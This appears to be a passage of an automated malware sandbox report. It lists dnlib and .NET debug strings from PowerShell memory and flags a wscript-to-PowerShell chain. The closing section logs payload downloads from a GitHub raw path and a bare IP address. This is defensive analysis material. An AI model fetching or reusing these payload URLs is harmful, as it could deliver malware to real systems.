Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb9 source: powershell.exe, 00000006.00000002.1382179143.000001776F389000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32h source: powershell.exe, 00000006.00000002.1348469263.00000177554C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.1382179143.000001776F389000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000006.00000002.1391686254.00007FFAAC7A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: re.pdb source: powershell.exe, 00000006.00000002.1382179143.000001776F323000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: 6?ll\System.pdb,4 source: powershell.exe, 00000006.00000002.1382179143.000001776F323000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000006.00000002.1391686254.00007FFAAC7A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ion.pdb source: powershell.exe, 00000006.00000002.1382179143.000001776F389000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aem.pdbdllj source: powershell.exe, 00000006.00000002.1382179143.000001776F389000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp

Software Vulnerabilities

barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /450/LDBRR.txt HTTP/1.1Host: 198.46.129.134Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownTCP traffic detected without corresponding DNS query: 198.46.129.134
